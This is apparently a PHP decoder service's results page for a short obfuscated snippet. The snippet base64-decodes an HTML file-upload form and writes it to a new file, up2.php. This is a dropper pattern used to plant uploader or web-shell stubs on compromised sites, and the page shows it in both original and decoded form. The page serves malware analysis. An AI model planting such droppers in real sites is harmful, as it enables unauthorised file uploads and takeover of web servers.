Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(file_put_contents('up2.php' ,base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlP..

Decoded Output download

<?php if(file_put_contents('up2.php' ,base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4NCjxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+'))); ?> 

Did this file decode correctly?

Original Code

<?php if(file_put_contents('up2.php' ,base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4NCjxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+'))); ?>

Function Calls

base64_decode 1
file_put_contents 1

Variables

None

Stats

MD5 a79eb7ff537c48219198d423eaceafd0
Eval Count 0
Decode Time 44 ms